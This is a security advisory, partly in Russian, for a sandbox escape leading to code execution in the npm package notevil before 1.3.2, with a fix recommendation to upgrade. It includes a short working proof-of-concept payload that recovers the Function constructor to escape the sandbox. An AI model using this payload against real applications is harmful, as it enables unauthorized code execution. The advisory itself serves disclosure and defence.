Описание
Sandbox Breakout / Arbitrary Code Execution in notevil
Versions of notevil prior to 1.3.2 are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to prevent access to the Function constructor by not checking the return values of function calls. This allows attackers to access the Function prototype's constructor leading to the Sandbox Escape. An example payload is:
var safeEval = require('notevil')
var input = "" +
"function fn() {};" +
"var constructorProperty = Object.getOwnPropertyDescriptors(fn.__proto__).constructor;" +
"var properties = Object.values(constructorProperty);" +
"properties.pop();" +
"properties.pop();" +
"properties.pop();" +
"var Function = properties.pop();" +
"(Function('return this'))()";
safeEval(input)```
## Recommendation
Upgrade to version 1.3.2 or later.
Пакеты
Наименование
notevil
npm
Затронутые версииВерсия исправления
< 1.3.2
1.3.2